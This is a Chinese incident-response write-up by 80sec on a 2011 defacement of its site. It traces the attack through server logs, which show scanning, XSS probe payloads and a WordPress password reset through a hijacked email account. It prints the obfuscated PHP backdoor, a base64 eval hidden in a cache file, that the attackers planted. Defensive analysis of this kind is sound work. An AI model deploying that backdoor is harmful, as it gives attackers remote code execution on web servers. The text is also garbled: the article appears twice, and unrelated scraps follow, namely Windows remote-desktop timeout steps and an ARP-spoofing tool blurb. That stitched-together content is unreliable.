EMail: jianxin#80sec.com
Site: http://www.80sec.com
Date: 2011-11-30
From: http://www.80sec.com/
[ 目录 ]
0×00 事件背景
0×01 应急响应
0×02 事件分析
0×03 事件启示
0×04 总结
0×00 事件背景
在感恩节的晚上,我们的站点遭遇了攻击,几名未知性别的黑客成功涂改掉了我们的首页,事情发生后很多朋友对我们被攻击的原因和经过都很关心,各种猜测都有,加上我们后续对于这次攻击的分析结果来看,我们觉得整次攻击和事后应急及分析的过程都适合作为一次典型的案例分析,把整件事情披露出来无论是对我们还是对业界会非常有意义,入侵者给我们在感恩节送了这么好的礼物,我们要好好接受才对:)
0×01 应急响应
事件发生之后的一段时间我们登录到服务器,由于首页替换的时间很短暂,我们甚至没有抓到截图,开始甚至都怀疑是ARP欺骗或者是DNS劫持之类的攻击,但是作为应急响应的箴言之一,我们最好不要相信猜测,一切以日志分析为主,一旦猜测我们从开始就输了。
我们知道在webserver的日志里记录了几乎所有有价值的信息,我们后续的检测必须依赖于日志,所以建议各位日志没开的同学先把日志打开并且保存足够长的时间,在这个有价值的信息里,我们第一个需要找准的就是攻击发生的具体时间点,因为我们是首页被黑并且时间较短,我们迅速stat了下首页文件的内容,发现完全正常没有任何改变:
File: `/home/jianxin/80sec.com/public_html/index.php’
Size: 397 Blocks: 8 IO Block: 4096 regular file
Device: ca00h/51712d Inode: 579843 Links: 1
Access: (0644/-rw-r–r–) Uid: ( 1001/ jianxin) Gid: ( 1001/ jianxin)
Access: 2011-07-13 04:16:57.000000000 +0800
Modify: 2011-07-13 04:16:55.000000000 +0800
Change: 2011-10-14 17:43:32.000000000 +0800
我们知道在linux系统下面的ctime会需要权限较高才能修改,而我们的系统是最新的patch,据我们了解也应该不存在使用未公开的漏洞来攻击我们的可能,毕竟我们只是一个技术站点,难道真的是ARP或者是Dns劫持么?在webserver的log里有一个选项记录了这一次请求所传递的数据量,我们对比了下发现,的确在某个时间首页的数据量有一个显著的减少:
173.234.184.45 – - [24/Nov/2011:20:44:13 +0800] “GET / HTTP/1.1″ 200 676 “-” “Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24″
218.213.229.74 – - [24/Nov/2011:20:44:26 +0800] “GET / HTTP/1.1″ 200 676 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152;
为676字节,而一般的请求大小为
98.142.220.112 – - [25/Nov/2011:00:39:32 +0800] “GET / HTTP/1.1″ 200 31831 “-” “curl/7.19.7 (i486-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k zlib/1.2.3.3 libidn/1.15″
31831字节,我们可以确认webserver的确出现了问题,入侵者的确能够控制我们的首页显示,到这里我们基本可以确定攻击时间和攻击的源IP了,当你被黑了的时候,第一个访问那个页面的基本就是攻击者本人,他们会迫不及待的来看攻击成果:)
既然服务器有问题了,那我们来看看今天有什么文件被修改了:
find /home/ -ctime 1
立刻我们就发现了一些好玩的东西:
看来这就是那只后门了,写到了一个全局可写的缓存文件里,而且特意做了隐藏,基本是正常的代码也不触发什么关键字,那么问题在于这么一些可爱的代码是怎么到我的服务器上的呢?这个后门我们发现最早出现的时间并不是在80sec里,而是在同一服务器上一个80sec童鞋的Blog里,最早的时间可以追朔到
218.213.229.74 - - [24/Nov/2011:00:12:56 +0800] "GET /wp-content/wp-cache-config.php HTTP/1.1" 200 308 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.106 Safari/535.2"
ip似乎也比较吻合,那么似乎假设如果没有猜错的话,第一个被攻击的目标应该是这个很勺的80sec童鞋的Blog才对,那么是如何攻击的呢?我们将日志里与这个ip相关的抽取出来
218.213.229.74 - - [16/Nov/2011:19:10:02 +0800] "GET /Admin1 HTTP/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/Nov/2011:19:10:02 +0800] "GET /my HTTP/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/Nov/2011:19:10:02 +0800] "GET /Upload HTTP/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/Nov/2011:19:10:02 +0800] "GET /User_Login HTTP/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/Nov/2011:19:10:02 +0800] "GET /upload HTTP/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/Nov/2011:19:10:03 +0800] "GET /admin1 HTTP/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/Nov/2011:19:10:03 +0800] "GET /conf HTTP/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/Nov/2011:19:10:03 +0800] "GET /Test HTTP/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/Nov/2011:19:10:03 +0800] "GET /houtai HTTP/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/Nov/2011:19:10:03 +0800] "GET /user_login HTTP/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/Nov/2011:19:10:03 +0800] "GET /sys HTTP/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/Nov/2011:19:10:03 +0800] "GET /news_admin HTTP/1.1" 404 7978 "-" "-"
攻击很早就发生了,甚至还使用了
218.213.229.74 - - [16/Nov/2011:20:29:10 +0800] "GET / HTTP/1.0" 200 37446 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
218.213.229.74 - - [16/Nov/2011:20:29:11 +0800] "GET / HTTP/1.0" 200 37446 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
218.213.229.74 - - [16/Nov/2011:20:29:11 +0800] "GET / HTTP/1.0" 200 37446 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
218.213.229.74 - - [16/Nov/2011:20:29:12 +0800] "GET /?s= HTTP/1.0″ 200 8620 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)”
218.213.229.74 – - [16/Nov/2011:20:29:12 +0800] “GET /?s=t>alert(1499328686)%3Bt> HTTP/1.0″ 200 8667 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)”
218.213.229.74 – - [16/Nov/2011:20:29:12 +0800] “GET / HTTP/1.0″ 200 37446 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)”
218.213.229.74 – - [16/Nov/2011:20:29:12 +0800] “GET /?p=t>alert(812396909)%3Bt> HTTP/1.0″ 200 37446 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)”
218.213.229.74 – - [16/Nov/2011:20:29:12 +0800] “GET /?s=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28990417228%29%3B%22%3E HTTP/1.0″ 200 8586 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)”
218.213.229.74 – - [16/Nov/2011:20:29:12 +0800] “GET /?s= HTTP/1.0″ 200 8777 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)”
218.213.229.74 – - [16/Nov/2011:20:29:12 +0800] “GET /?p= HTTP/1.0″ 200 37446 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)”
218.213.229.74 – - [16/Nov/2011:20:29:12 +0800] “GET /?p= HTTP/1.0″ 200 37446 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)”
218.213.229.74 – - [16/Nov/2011:20:29:13 +0800] “GET /?s= HTTP/1.0″ 200 8816 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)”
218.213.229.74 – - [16/Nov/2011:20:29:13 +0800] “GET /?p=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%288013950%29%3B%22%3E HTTP/1.0″ 200 37446 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)”
218.213.229.74 – - [16/Nov/2011:20:29:13 +0800] “GET / HTTP/1.0″ 200 37446 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)”
218.213.229.74 – - [16/Nov/2011:20:29:13 +0800] “GET /?p= HTTP/1.0″ 200 37446 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)”
一个web扫描工具对站点进行了详细的扫描,连一个功能简单的开源blog都不放过,可以猜测对一般的站点每天要遭受多少蹂躏,最后攻击者开始找回密码
218.213.229.74 – - [19/Nov/2011:05:25:39 +0800] “GET /wp-admin/images/button-grad-active.png HTTP/1.1″ 200 575 “http://sex1986.com/wp-login.php” “Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.772.0 Safari/535.1″
218.213.229.74 – - [19/Nov/2011:05:25:40 +0800] “POST /wp-login.php HTTP/1.1″ 200 2155 “http://sex1986.com/wp-login.php” “Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.772.0 Safari/535.1″
218.213.229.74 – - [19/Nov/2011:05:29:01 +0800] “POST /wp-login.php HTTP/1.1″ 200 2156 “http://sex1986.com/wp-login.php” “Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.772.0 Safari/535.1″
218.213.229.74 – - [19/Nov/2011:05:29:03 +0800] “GET /wp-login.php?action=lostpassword HTTP/1.1″ 200 1741 “http://sex1986.com/wp-login.php” “Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.772.0 Safari/535.1″
218.213.229.74 – - [19/Nov/2011:05:29:19 +0800] “POST /wp-login.php?action=lostpassword HTTP/1.1″ 200 2106 “http://sex1986.com/wp-login.php?action=lostpassword” “Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.772.0 Safari/535.1″
最后,攻击者的确成功的取回了密码,然后通过这个密码进入了后台,后台的功能比较丰富然后上传了后门,在清楚攻击者的手法之后我们很快定位了原因和进行了处理,我们的服务器以较低身份运行,而程序文件权限是以属主身份运行,所以整个web目录不可写,较好的控制了入侵的范围,在对入侵者放置在各个角落里的后门处理之后,我们修改相应密码恢复了站点的运行;
0×02 事件分析
我们讨论一次入侵事件,必须要清楚相应的目的,在恢复站点运行之后,我们分析了入侵者所有的动作,大概可以总结如下这次攻击更像是针对wooyun.org的一次攻击,因为wooyun.org近期的一些事情被迁移到日本的vps,所以这可能是一次长期的持久的渗透攻击,专业点称为APT攻击,但是由于代码逻辑完全不在这台服务器上,所以攻击者失败了。
攻击者在取回邮箱密码的时候手法值得怀疑,尽管整个事件的源头是由于某个很勺的80sec童鞋,这位童鞋虽然很勺,但是绝对不使用弱口令也不会使用生日密码(我们的安全意识不像传闻的那样弱),同时这位悲催的童鞋有两个邮箱,一个邮箱是wordpess的密码找回邮箱!另外一个邮箱同样也是这个wordpress密码邮箱的密码找回邮箱!wordpess和两个邮箱的安全关联层层相扣!未知性别的感恩节攻击者采用读心术控制了我们这位很纯洁的童鞋的最后一个关键邮箱,在没有漏洞的情况下渗透进了服务器,得到了大家上面所看到的结果,很伟大,不是么?
通过一段时间的关联分析,我们发现与这次攻击相关的人都可能遭受到不同程度的牵连,包括曾经在80sec.com上注册的不少用户都通过邮箱找回了密码,而攻击的来源与此次攻击者正好相同,这里最大的问题在于,谁能够同时拥有这么多邮箱,包括163,hotmail以及gmail的密码,我们有理由相信这次攻击与国内很多大型社区的数据库失窃,与传闻的某邮箱数据库失窃有关。
攻击者所使用的后门开始有意识的进行躲避和查杀,如果不是入侵者通过缓存直接修改了首页,那么这次攻击可能隐蔽得更深更长时间,所造成的危害可能更大,对于80sec而言,我们所有的文档和技术都在站点进行分享,并没有安全级别要求较高的数据,所以可能影响不大,但是对于一些包含重要数据的企业和网站而言,同时我们事后发现攻击者所使用的IP是一家站点,很可能该家站点已经被攻陷作为跳板,如何在攻击发生和尝试发生时发现和阻止将是一件很有挑战的事情。
0×03 事件启示
在这件事情里,我们觉得对我们最有意义包括两点,一点是现有互联网认证机制的崩溃,这主要表现在目前的互联网的认证是基于电子邮件的认证,电子邮件在各个企业和互联网公司都被用作标识用户身份,而经过近几年黑客一轮又一轮的洗礼,目前国内互联网企业里含有较大用户基数的站点都可能已经沦陷,而在即使知道自己用户数据库被窃取之后大多数的企业基于自身利益原因还是会保持沉默。黑客在攒积大量的用户密码之后,就可以使得基于账户密码,基于邮箱认证的现有安全认证机制失效,这已经是现有互联网企业的灾难,请想想你们企业内部邮箱是否对外,以及邮箱是否是静态密码,如果邮箱是内部,那么VPN呢,而这种安全机制的失效又称为攻击者攒积新的数据库的基础,形成一个巨大的黑色雪球,彻底瓦解互联网安全。
另外一部分是关于apt攻击的,理论上我们只要有一个目标,基本是没有攻破不了的,特别是对于大企业而言,架构的改动,IDC的扩充,企业并购和投资都可能为你的安全体系引入新的风险,如何在一个动态的环境下建设一个较为完善的安全体系,这将是安全人员面临的一个巨大挑战,因为从这一次时间里就可以看到,我们并没有因为是存在什么实际的漏洞而导致被入侵。
0×04 总结
在80sec出现问题之后,不少人猜测是漏洞还是什么原因遭受攻击,有人怀疑是安全意识问题,也有一些安全厂商询问是否可以通过WAF或者其他的安全产品来避免此次安全事件,不过在事件披露之后,相信大家应该很清楚能否通过现有产品来避免此类的攻击行为,我们的安全概念需要更新了,不只是漏洞也不只是安全意识了,包括安全的理解,对攻击的理解都需要有一个全新的认识了,最后欢迎微博上某位产品安全厂商开发出能够保护我们的安全产品,也欢迎攻击者可以联系到我们看看我们的整个过程的分析是否正确
Site: http://www.80sec.com
Date: 2011-11-30
From: http://www.80sec.com/
[ 目录 ]
0×00 事件背景
0×01 应急响应
0×02 事件分析
0×03 事件启示
0×04 总结
0×00 事件背景
在感恩节的晚上,我们的站点遭遇了攻击,几名未知性别的黑客成功涂改掉了我们的首页,事情发生后很多朋友对我们被攻击的原因和经过都很关心,各种猜测都有,加上我们后续对于这次攻击的分析结果来看,我们觉得整次攻击和事后应急及分析的过程都适合作为一次典型的案例分析,把整件事情披露出来无论是对我们还是对业界会非常有意义,入侵者给我们在感恩节送了这么好的礼物,我们要好好接受才对:)
0×01 应急响应
事件发生之后的一段时间我们登录到服务器,由于首页替换的时间很短暂,我们甚至没有抓到截图,开始甚至都怀疑是ARP欺骗或者是DNS劫持之类的攻击,但是作为应急响应的箴言之一,我们最好不要相信猜测,一切以日志分析为主,一旦猜测我们从开始就输了。
我们知道在webserver的日志里记录了几乎所有有价值的信息,我们后续的检测必须依赖于日志,所以建议各位日志没开的同学先把日志打开并且保存足够长的时间,在这个有价值的信息里,我们第一个需要找准的就是攻击发生的具体时间点,因为我们是首页被黑并且时间较短,我们迅速stat了下首页文件的内容,发现完全正常没有任何改变:
File: `/home/jianxin/80sec.com/public_html/index.php’
Size: 397 Blocks: 8 IO Block: 4096 regular file
Device: ca00h/51712d Inode: 579843 Links: 1
Access: (0644/-rw-r–r–) Uid: ( 1001/ jianxin) Gid: ( 1001/ jianxin)
Access: 2011-07-13 04:16:57.000000000 +0800
Modify: 2011-07-13 04:16:55.000000000 +0800
Change: 2011-10-14 17:43:32.000000000 +0800
我们知道在linux系统下面的ctime会需要权限较高才能修改,而我们的系统是最新的patch,据我们了解也应该不存在使用未公开的漏洞来攻击我们的可能,毕竟我们只是一个技术站点,难道真的是ARP或者是Dns劫持么?在webserver的log里有一个选项记录了这一次请求所传递的数据量,我们对比了下发现,的确在某个时间首页的数据量有一个显著的减少:
173.234.184.45 – - [24/Nov/2011:20:44:13 +0800] “GET / HTTP/1.1″ 200 676 “-” “Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24″
218.213.229.74 – - [24/Nov/2011:20:44:26 +0800] “GET / HTTP/1.1″ 200 676 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152;
为676字节,而一般的请求大小为
98.142.220.112 – - [25/Nov/2011:00:39:32 +0800] “GET / HTTP/1.1″ 200 31831 “-” “curl/7.19.7 (i486-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k zlib/1.2.3.3 libidn/1.15″
31831字节,我们可以确认webserver的确出现了问题,入侵者的确能够控制我们的首页显示,到这里我们基本可以确定攻击时间和攻击的源IP了,当你被黑了的时候,第一个访问那个页面的基本就是攻击者本人,他们会迫不及待的来看攻击成果:)
既然服务器有问题了,那我们来看看今天有什么文件被修改了:
find /home/ -ctime 1
立刻我们就发现了一些好玩的东西:
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');
看来这就是那只后门了,写到了一个全局可写的缓存文件里,而且特意做了隐藏,基本是正常的代码也不触发什么关键字,那么问题在于这么一些可爱的代码是怎么到我的服务器上的呢?这个后门我们发现最早出现的时间并不是在80sec里,而是在同一服务器上一个80sec童鞋的Blog里,最早的时间可以追朔到
218.213.229.74 - - [24/Nov/2011:00:12:56 +0800] "GET /wp-content/wp-cache-config.php HTTP/1.1" 200 308 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.106 Safari/535.2"
ip似乎也比较吻合,那么似乎假设如果没有猜错的话,第一个被攻击的目标应该是这个很勺的80sec童鞋的Blog才对,那么是如何攻击的呢?我们将日志里与这个ip相关的抽取出来
218.213.229.74 - - [16/Nov/2011:19:10:02 +0800] "GET /Admin1 HTTP/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/Nov/2011:19:10:02 +0800] "GET /my HTTP/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/Nov/2011:19:10:02 +0800] "GET /Upload HTTP/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/Nov/2011:19:10:02 +0800] "GET /User_Login HTTP/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/Nov/2011:19:10:02 +0800] "GET /upload HTTP/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/Nov/2011:19:10:03 +0800] "GET /admin1 HTTP/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/Nov/2011:19:10:03 +0800] "GET /conf HTTP/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/Nov/2011:19:10:03 +0800] "GET /Test HTTP/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/Nov/2011:19:10:03 +0800] "GET /houtai HTTP/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/Nov/2011:19:10:03 +0800] "GET /user_login HTTP/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/Nov/2011:19:10:03 +0800] "GET /sys HTTP/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/Nov/2011:19:10:03 +0800] "GET /news_admin HTTP/1.1" 404 7978 "-" "-"
攻击很早就发生了,甚至还使用了
218.213.229.74 - - [16/Nov/2011:20:29:10 +0800] "GET / HTTP/1.0" 200 37446 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
218.213.229.74 - - [16/Nov/2011:20:29:11 +0800] "GET / HTTP/1.0" 200 37446 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
218.213.229.74 - - [16/Nov/2011:20:29:11 +0800] "GET / HTTP/1.0" 200 37446 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
218.213.229.74 - - [16/Nov/2011:20:29:12 +0800] "GET /?s= HTTP/1.0″ 200 8620 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)”
218.213.229.74 – - [16/Nov/2011:20:29:12 +0800] “GET /?s=t>alert(1499328686)%3Bt> HTTP/1.0″ 200 8667 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)”
218.213.229.74 – - [16/Nov/2011:20:29:12 +0800] “GET / HTTP/1.0″ 200 37446 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)”
218.213.229.74 – - [16/Nov/2011:20:29:12 +0800] “GET /?p=t>alert(812396909)%3Bt> HTTP/1.0″ 200 37446 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)”
218.213.229.74 – - [16/Nov/2011:20:29:12 +0800] “GET /?s=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28990417228%29%3B%22%3E HTTP/1.0″ 200 8586 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)”
218.213.229.74 – - [16/Nov/2011:20:29:12 +0800] “GET /?s= HTTP/1.0″ 200 8777 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)”
218.213.229.74 – - [16/Nov/2011:20:29:12 +0800] “GET /?p= HTTP/1.0″ 200 37446 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)”
218.213.229.74 – - [16/Nov/2011:20:29:12 +0800] “GET /?p= HTTP/1.0″ 200 37446 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)”
218.213.229.74 – - [16/Nov/2011:20:29:13 +0800] “GET /?s= HTTP/1.0″ 200 8816 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)”
218.213.229.74 – - [16/Nov/2011:20:29:13 +0800] “GET /?p=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%288013950%29%3B%22%3E HTTP/1.0″ 200 37446 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)”
218.213.229.74 – - [16/Nov/2011:20:29:13 +0800] “GET / HTTP/1.0″ 200 37446 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)”
218.213.229.74 – - [16/Nov/2011:20:29:13 +0800] “GET /?p= HTTP/1.0″ 200 37446 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)”
一个web扫描工具对站点进行了详细的扫描,连一个功能简单的开源blog都不放过,可以猜测对一般的站点每天要遭受多少蹂躏,最后攻击者开始找回密码
218.213.229.74 – - [19/Nov/2011:05:25:39 +0800] “GET /wp-admin/images/button-grad-active.png HTTP/1.1″ 200 575 “http://sex1986.com/wp-login.php” “Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.772.0 Safari/535.1″
218.213.229.74 – - [19/Nov/2011:05:25:40 +0800] “POST /wp-login.php HTTP/1.1″ 200 2155 “http://sex1986.com/wp-login.php” “Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.772.0 Safari/535.1″
218.213.229.74 – - [19/Nov/2011:05:29:01 +0800] “POST /wp-login.php HTTP/1.1″ 200 2156 “http://sex1986.com/wp-login.php” “Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.772.0 Safari/535.1″
218.213.229.74 – - [19/Nov/2011:05:29:03 +0800] “GET /wp-login.php?action=lostpassword HTTP/1.1″ 200 1741 “http://sex1986.com/wp-login.php” “Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.772.0 Safari/535.1″
218.213.229.74 – - [19/Nov/2011:05:29:19 +0800] “POST /wp-login.php?action=lostpassword HTTP/1.1″ 200 2106 “http://sex1986.com/wp-login.php?action=lostpassword” “Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.772.0 Safari/535.1″
最后,攻击者的确成功的取回了密码,然后通过这个密码进入了后台,后台的功能比较丰富然后上传了后门,在清楚攻击者的手法之后我们很快定位了原因和进行了处理,我们的服务器以较低身份运行,而程序文件权限是以属主身份运行,所以整个web目录不可写,较好的控制了入侵的范围,在对入侵者放置在各个角落里的后门处理之后,我们修改相应密码恢复了站点的运行;
0×02 事件分析
我们讨论一次入侵事件,必须要清楚相应的目的,在恢复站点运行之后,我们分析了入侵者所有的动作,大概可以总结如下这次攻击更像是针对wooyun.org的一次攻击,因为wooyun.org近期的一些事情被迁移到日本的vps,所以这可能是一次长期的持久的渗透攻击,专业点称为APT攻击,但是由于代码逻辑完全不在这台服务器上,所以攻击者失败了。
攻击者在取回邮箱密码的时候手法值得怀疑,尽管整个事件的源头是由于某个很勺的80sec童鞋,这位童鞋虽然很勺,但是绝对不使用弱口令也不会使用生日密码(我们的安全意识不像传闻的那样弱),同时这位悲催的童鞋有两个邮箱,一个邮箱是wordpess的密码找回邮箱!另外一个邮箱同样也是这个wordpress密码邮箱的密码找回邮箱!wordpess和两个邮箱的安全关联层层相扣!未知性别的感恩节攻击者采用读心术控制了我们这位很纯洁的童鞋的最后一个关键邮箱,在没有漏洞的情况下渗透进了服务器,得到了大家上面所看到的结果,很伟大,不是么?
通过一段时间的关联分析,我们发现与这次攻击相关的人都可能遭受到不同程度的牵连,包括曾经在80sec.com上注册的不少用户都通过邮箱找回了密码,而攻击的来源与此次攻击者正好相同,这里最大的问题在于,谁能够同时拥有这么多邮箱,包括163,hotmail以及gmail的密码,我们有理由相信这次攻击与国内很多大型社区的数据库失窃,与传闻的某邮箱数据库失窃有关。
攻击者所使用的后门开始有意识的进行躲避和查杀,如果不是入侵者通过缓存直接修改了首页,那么这次攻击可能隐蔽得更深更长时间,所造成的危害可能更大,对于80sec而言,我们所有的文档和技术都在站点进行分享,并没有安全级别要求较高的数据,所以可能影响不大,但是对于一些包含重要数据的企业和网站而言,同时我们事后发现攻击者所使用的IP是一家站点,很可能该家站点已经被攻陷作为跳板,如何在攻击发生和尝试发生时发现和阻止将是一件很有挑战的事情。
0×03 事件启示
在这件事情里,我们觉得对我们最有意义包括两点,一点是现有互联网认证机制的崩溃,这主要表现在目前的互联网的认证是基于电子邮件的认证,电子邮件在各个企业和互联网公司都被用作标识用户身份,而经过近几年黑客一轮又一轮的洗礼,目前国内互联网企业里含有较大用户基数的站点都可能已经沦陷,而在即使知道自己用户数据库被窃取之后大多数的企业基于自身利益原因还是会保持沉默。黑客在攒积大量的用户密码之后,就可以使得基于账户密码,基于邮箱认证的现有安全认证机制失效,这已经是现有互联网企业的灾难,请想想你们企业内部邮箱是否对外,以及邮箱是否是静态密码,如果邮箱是内部,那么VPN呢,而这种安全机制的失效又称为攻击者攒积新的数据库的基础,形成一个巨大的黑色雪球,彻底瓦解互联网安全。
另外一部分是关于apt攻击的,理论上我们只要有一个目标,基本是没有攻破不了的,特别是对于大企业而言,架构的改动,IDC的扩充,企业并购和投资都可能为你的安全体系引入新的风险,如何在一个动态的环境下建设一个较为完善的安全体系,这将是安全人员面临的一个巨大挑战,因为从这一次时间里就可以看到,我们并没有因为是存在什么实际的漏洞而导致被入侵。
0×04 总结
在80sec出现问题之后,不少人猜测是漏洞还是什么原因遭受攻击,有人怀疑是安全意识问题,也有一些安全厂商询问是否可以通过WAF或者其他的安全产品来避免此次安全事件,不过在事件披露之后,相信大家应该很清楚能否通过现有产品来避免此类的攻击行为,我们的安全概念需要更新了,不只是漏洞也不只是安全意识了,包括安全的理解,对攻击的理解都需要有一个全新的认识了,最后欢迎微博上某位产品安全厂商开发出能够保护我们的安全产品,也欢迎攻击者可以联系到我们看看我们的整个过程的分析是否正确
决方法:
一、开始-->运行-->gpedit.msc 计算机配置->管理模板->Windows组件->终端服务->会话 把"为断开的会话设置时间限制"改为"未被配置"。
如果通过上面的操作,还是自动注销,就使用第二种方法
二、开始-->运行-->tscc.msc 连接-->RDP-Tcp右键属性-->会话 把这里面的替代用户设置的设置都改为从不,并且把从不勾选
如果通过上面的操作,还是自动注销,就使用第三种方法
三、开始-->所有程序--> 管理工具-->本地安全策略-->本地策略-->安全选项:microsoft网络服务器:当登录时间用完后自动注销用户,改为“已禁用”。microsoft网络服务器:在挂起会话之前所需的空闲时间,改为99999,实际上是禁止了此策略
一、开始-->运行-->gpedit.msc 计算机配置->管理模板->Windows组件->终端服务->会话 把"为断开的会话设置时间限制"改为"未被配置"。
如果通过上面的操作,还是自动注销,就使用第二种方法
二、开始-->运行-->tscc.msc 连接-->RDP-Tcp右键属性-->会话 把这里面的替代用户设置的设置都改为从不,并且把从不勾选
如果通过上面的操作,还是自动注销,就使用第三种方法
三、开始-->所有程序--> 管理工具-->本地安全策略-->本地策略-->安全选项:microsoft网络服务器:当登录时间用完后自动注销用户,改为“已禁用”。microsoft网络服务器:在挂起会话之前所需的空闲时间,改为99999,实际上是禁止了此策略
基于ARP欺骗的东东,可网页插马DNS欺骗,自定义关键字嗅探等 网络地址信息:
0. Realtek RTL8139
IP Address. . . . . : 192.168.1.101
Physical Address. . : 00-11-D8-6B-5E-19
Default Gateway . . : 192.168.1.1
